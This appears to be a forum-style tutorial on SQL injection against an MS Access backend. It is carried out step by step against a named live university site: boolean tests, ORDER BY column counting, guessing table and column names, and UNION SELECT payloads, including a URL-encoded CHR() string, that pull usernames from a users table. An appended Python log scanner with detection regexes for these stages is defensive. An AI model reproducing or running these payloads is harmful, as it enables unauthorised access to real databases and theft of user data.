- MICROSOFT ACCESS SQL INJECTION
- Here I will show you how to perform SQL injection against an MS Access database :)
- As we know, MS Access has no information_schema, so we have to brute-force almost everything :p
- just like MySQL <= 4 :)
- For better understanding, I am going to perform the injection on a live site *_*
- Here we go,
- SITE: http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12
- Let's check whether it is a false positive or not,
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 1=1 (no error)
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 1>1 (error *_* )
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 1=2 (Error)
- It's integer based, let's start the injection now ;)
- Let's find the number of columns with a simple ORDER BY statement,
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order by 1 ( no error )
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order by 2 (no error)
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order by 3 (no error)
- .
- .
- .
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order by 7 (Error)
- So the number of columns here is 6 :)
- We can't use a UNION SELECT statement unless we know at least one table name.
- Let's find a table name first. As I already mentioned, MS Access has no information_schema, so we have to guess table names. Here is your query :)
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count(*) from [hii] and 1=1
- Here is your result, as "hii" is not a valid table name :)
- Now replace "hii" with some common table names.
- I highly recommend using an automated tool or script to do this, because it is a somewhat annoying and time-consuming process :/ I have written a Python script for this; I will publish it soon ;)
- For now let's do it manually:
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count(*) from [admin] and 1=1
- ...................... ( ERROR)
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count(*) from [tbl_user] and 1=1 ............................(ERROR)
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count(*) from [users] and 1=1 .......... ( BINGO!!!!!! NO ERROR) *_*
- So this indicates that the table "users" exists in the database :)
- We can follow the same procedure to find columns. Here is our query :)
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count([hii]) from [users]) and 1=1
- Now replace "hii" with different column names and repeat the whole procedure again. Hope you understand :)
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12and 0<=(select count([id]) from [users]) and 1=1
- .............( NO ERROR)
- After spending a lot of time on column names, I found "id, name, email" as columns of the table "users".
- NOW LET'S DO IT UNION BASED,
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 union select 1,2,3,4,5,6 from users
- ............................(HERE WE MUST MENTION THE TABLE NAME)
- Here we got vulnerable column 2.
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 union select 1,2,3,4,5,6 from users
- Let's extract some data from the table "users", where the column names are "id, name, email & username" ;)
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 union select 1,username,3,4,5,6 from users
- I once posted this as a challenge on "Web InJ3ct0rs-SQL, XSS, LDAP, XPATH ,XML ,R/LFI Injections".
- I got different solutions from others; I'm going to share one of them with you.
- Thanks to Janus Slovan for his solution :)
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=-2%20UnIoN%20aLL%20SeLeCt%201,%20%20left(date(),10)%20%2b%20%20CHR(32)%20%2b%20CHR(58)%20%2b%20CHR(58)%20%2b%20CHR(32)%20%2b%20CHR(106)%20%2b%20CHR(97)%20%2b%20CHR(110)%20%2b%20CHR(117)%20%2b%20CHR(115)%20%2b%20%20CHR(32)%20%2b%20CHR(58)%20%2b%20CHR(58)%20%2b%20CHR(32)%20%2b%20username%20%2b%20%20CHR(32)%20%2b%20CHR(58)%20%2b%20CHR(58)%20%2b%20CHR(32)%20%2b%20name,3,4,5,6%20from%20users
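Seen from the defender's side, the sequence above (boolean test, ORDER BY counting, name guessing through `select count(...) from [...]`, then UNION SELECT with CHR() concatenation) leaves a recognisable trail in web server logs. The following is an added example, not part of the original paste: a log scanner that flags clients covering several of these stages. It assumes combined log format and that failed probes return a 5xx status; the IP addresses, paths and log lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Probe stages from the write-up, matched against the URL-decoded query string.
STAGES = {
    "boolean_test": re.compile(r"\band\s+\d+\s*(?:<=|>=|=|<|>)\s*\d+", re.I),
    "order_by_count": re.compile(r"\border\s+by\s+\d+", re.I),
    "name_guess": re.compile(r"select\s+count\s*\(.*?\)\s+from\s+\[?\w+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "chr_concat": re.compile(r"\bchr\s*\(\s*\d+\s*\)", re.I),
}
# Combined-log-format prefix: client IP, request target, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

def classify(request_target):
    """Return the set of probe stages visible in one request target."""
    decoded = unquote_plus(request_target.partition("?")[2])
    return {name for name, rx in STAGES.items() if rx.search(decoded)}

def scan(lines, min_stages=2):
    """Report clients whose requests cover at least min_stages distinct stages."""
    stages, probes, errors = defaultdict(set), defaultdict(int), defaultdict(int)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        found = classify(target)
        if found:
            stages[ip] |= found
            probes[ip] += 1
            errors[ip] += status.startswith("5")  # assumption: failed probes return 5xx
    return {ip: {"stages": sorted(s), "probes": probes[ip], "errors": errors[ip]}
            for ip, s in stages.items() if len(s) >= min_stages}

# Constructed sample log lines (documentation IP ranges, hypothetical paths).
TS = "[01/Jan/2024:10:00:00 +0000]"
SAMPLE = [
    f'203.0.113.7 - - {TS} "GET /news.php?id=12%20and%201=1 HTTP/1.1" 200 5120',
    f'203.0.113.7 - - {TS} "GET /news.php?id=12%20order%20by%207 HTTP/1.1" 500 310',
    f'203.0.113.7 - - {TS} "GET /news.php?id=12%20and%200%3C=(select%20count(*)'
    f'%20from%20[admin])%20and%201=1 HTTP/1.1" 500 310',
    f'203.0.113.7 - - {TS} "GET /news.php?id=12%20union%20select%201,2,3,4,5,6'
    f'%20from%20users HTTP/1.1" 200 5300',
    f'198.51.100.20 - - {TS} "GET /news.php?id=12 HTTP/1.1" 200 5120',
    f'198.51.100.20 - - {TS} "GET /search.php?q=bread+and+butter HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, report in scan(SAMPLE).items():
        print(ip, report)
```

A burst of `name_guess` requests with mostly error responses from one client is the brute-force phase the paste describes, and is usually the loudest signal.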